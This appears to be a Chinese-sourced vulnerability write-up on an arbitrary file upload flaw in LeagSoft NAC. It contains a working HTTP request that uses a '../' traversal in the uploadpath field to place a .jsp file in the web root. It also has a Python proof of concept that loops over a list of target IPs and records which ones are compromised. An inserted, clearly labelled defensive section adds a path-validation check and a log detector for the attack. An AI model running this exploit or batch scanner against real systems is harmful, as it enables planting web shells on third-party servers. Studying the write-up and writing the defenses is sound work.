联软准入 (LeagSoft NAC) Arbitrary File Upload Vulnerability

1. Vulnerability Overview

2. Impact

3. Reproduction

The endpoint /uai/download/uploadfileToPath.htm accepts a multipart form with the file in the `input_localfile` part and a caller-controlled `uploadpath` part. Because `uploadpath` is used as-is when the file is written, a `../` prefix places the file outside the intended upload directory, here inside the web application directory, where a .jsp file is served and executed:

    POST /uai/download/uploadfileToPath.htm HTTP/1.1
    Host: www.0-sec.org:8099
    User-Agent: python-requests/2.22.0
    Accept-Encoding: gzip, deflate
    Accept: */*
    Connection: close
    Content-Length: 308
    Content-Type: multipart/form-data; boundary=ea8ef2c3b016cd152a651d2799ef2c5c

    --ea8ef2c3b016cd152a651d2799ef2c5c
    Content-Disposition: form-data; name="input_localfile"; filename="111.jsp"
    Content-Type: text/plain

    aaaaa
    --ea8ef2c3b016cd152a651d2799ef2c5c
    Content-Disposition: form-data; name="uploadpath";

    ../webapps/notifymsg/devreport/
    --ea8ef2c3b016cd152a651d2799ef2c5c--

[screenshot: 1.png]

The uploaded file is then reachable at:

https://www.0-sec.org/notifymsg/devreport/111.jsp

[screenshot: 2.png]
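Added defensive example, not code from the original write-up or from the vendor: a server-side check that resolves the client-supplied uploadpath under a fixed upload root and refuses both directory traversal and server-executed extensions, plus a log correlation that flags the upload-then-fetch sequence shown above. The upload root, the extension allow-list and the access-log lines are constructed assumptions.

```python
import posixpath
import re

# Assumed values for the illustration (not from the advisory): the directory
# uploads are meant to land in, and the extensions a document upload needs.
UPLOAD_ROOT = "/opt/uai/upload"
ALLOWED_EXT = {".txt", ".pdf", ".png", ".jpg"}

def resolve_upload_target(user_path, filename, root=UPLOAD_ROOT):
    """Server-side check for a client-supplied uploadpath: join it to a fixed
    root, normalise, and refuse anything that escapes the root or carries an
    executable extension. Returns the final path, or None to reject."""
    root = posixpath.normpath(root)
    name = posixpath.basename(filename.replace("\\", "/"))  # drop any dir part
    if not name or "\x00" in name or "\x00" in user_path:
        return None
    candidate = posixpath.normpath(posixpath.join(root, user_path.lstrip("/"), name))
    if candidate != root and not candidate.startswith(root + "/"):
        return None  # '../' walked out of the upload root (e.g. into webapps/)
    if posixpath.splitext(name)[1].lower() not in ALLOWED_EXT:
        return None  # .jsp and other server-executed types are never accepted
    return candidate

# Constructed access-log lines (Combined Log Format) reproducing the sequence
# from the write-up: POST to the upload endpoint, then a GET of the dropped JSP.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "POST /uai/download/uploadfileToPath.htm HTTP/1.1" 200 512 "-" "python-requests/2.22.0"
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /notifymsg/devreport/111.jsp HTTP/1.1" 200 5 "-" "python-requests/2.22.0"
10.0.0.9 - - [01/Jan/2024:10:05:00 +0000] "POST /uai/download/uploadfileToPath.htm HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:05:02 +0000] "GET /notifymsg/devreport/report.pdf HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
"""
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\w+) (\S+) [^"]*" (\d{3})')

def find_upload_then_jsp(log_text):
    """Flag source IPs that POSTed to uploadfileToPath.htm and then fetched a
    .jsp under /notifymsg/ with a 200, i.e. the file was actually written."""
    uploaded, hits = set(), []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, path, status = m.groups()
        if method == "POST" and path.startswith("/uai/download/uploadfileToPath.htm"):
            uploaded.add(ip)
        elif (method == "GET" and status == "200" and ip in uploaded
              and path.startswith("/notifymsg/") and path.lower().endswith(".jsp")):
            hits.append((ip, path))
    return hits
```

The traversal check alone would still let a .jsp be written inside the upload root, which is why the extension allow-list is a separate, second gate.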

PoC

poc.py:

    import requests

    def main(line):
        proxies = {'http': 'http://localhost:8080'}
        # url = 'https://www.0-sec.org/uai/download/uploadfileToPath.htm'
        target = line.strip()
        url = target + '/uai/download/uploadfileToPath.htm'
        url_2 = target + '/notifymsg/devreport/{}'
        # local file to upload; the verification below expects its
        # contents to include the marker string 'xxx'
        filename = '111.txt'
        with open(filename) as fh:
            files = {
                'input_localfile': (filename, fh, 'text/plain'),
            }
            content = {
                'uploadpath': '../webapps/notifymsg/devreport/'
            }
            res = requests.post(url, files=files, proxies=proxies, data=content, verify=False)
        # print(res.text)
        # fetch the file back from the web root to confirm it was written
        res_2 = requests.get(url_2.format(filename), verify=False)
        if 'xxx' in res_2.text:
            print('ok....')
            with open('ok.txt', mode='a') as f:
                f.write(url_2.format(filename) + '\n')
            print('写入成功...')

    if __name__ == '__main__':
        with open('ip.txt', mode='r') as f:
            for line in f.readlines():
                if line == '\n':
                    continue  # skip empty lines
                main(line)

References

https://blog.csdn.net/m0_48520508/article/details/108790281